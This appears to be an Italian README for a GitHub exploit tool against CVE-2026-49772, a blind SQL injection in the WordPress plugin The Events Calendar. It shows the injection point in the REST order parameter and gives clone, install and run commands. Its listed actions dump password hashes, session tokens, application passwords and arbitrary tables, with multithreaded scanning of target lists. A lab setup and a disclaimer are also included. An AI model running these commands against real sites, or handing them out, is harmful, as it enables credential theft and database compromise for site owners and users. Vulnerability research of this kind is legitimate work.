
Exploit di SQL injection cieca per CVE-2026-49772 che prende di mira il plugin WordPress The Events Calendar. Estrae il contenuto del database tramite oracolo booleano/temporale con scansione multithread, dump degli hash utente e supporto per query personalizzate.
CVE-2026-49772 è una SQL injection cieca non autenticata nel plugin WordPress
The Events Calendar. Un validator di parametri REST difettoso (validate_callback
restituisce una closure invece di validare) permette al parametro order sull'API
REST sperimentale tec/v1 di raggiungere la clausola SQL ORDER BY non sanificata:
GET /wp-json/tec/v1/events?orderby=event_date&order=<INIEZIONE>
... ORDER BY event_date <INIEZIONE>, wp_posts.post_date DESC ...
Questa è un'iniezione sola lettura (nessuna query impilata, nessuna scrittura, nessun output diretto) — ma l'intero database è estraibile tramite un oracolo booleano/temporale: hash delle password utente, token di sessione, password delle applicazioni, chiavi segrete.
Versioni affette: The Events Calendar 6.15.12 – 6.16.2 (corretto in 6.16.3)
Severità: CVSS 3.1 9.3 Critico — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
--check — Rilevamento non invasivo: namespace REST, versione del plugin, conferma temporale--recon — Impronta digitale del DB: versione, utente corrente, database, SO, privilegi, prefisso tabelle--users — Scarica wp_users: login, email, hash delle password--user-meta — Scarica wp_usermeta: token di sessione, password delle applicazioni, capacità--get-table — Scarica qualsiasi tabella con rilevamento automatico delle colonne--query — Estrae il risultato di qualsiasi SELECT scalareLibreria standard pura Python 3 — requirements.txt è incluso per il flusso di lavoro
standard ma non installa nulla di extra.
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
python3 CVE-2026-49772.py <target> <azione> [opzioni]
Scegli esattamente un'azione: --check, --recon, --users, --user-meta,
--get-table <TABELLA>, --query <SQL>. Esegui --help per tutte le opzioni.
python3 CVE-2026-49772.py target.tld --check
python3 CVE-2026-49772.py target.tld --recon
python3 CVE-2026-49772.py target.tld --users
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
Ottimizzazione: --technique boolean|time, --delay, --threads, --rows, --prefix,
--where, -useragent, -timeout. Scansiona molti host con -l targets.txt.
Un laboratorio Docker Compose autonomo con il plugin vulnerabile (incluso, non scaricato all'avvio) ed eventi pre-popolati. Vedi docker/DOCKER.md.
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
/wp-json/tec/v1/ nel WAF / proxy inversoQuesto strumento è fornito solo per scopi educativi e di ricerca. Usalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta a testare. Il creatore non si assume alcuna responsabilità per qualsiasi uso improprio o danno causato da questo strumento.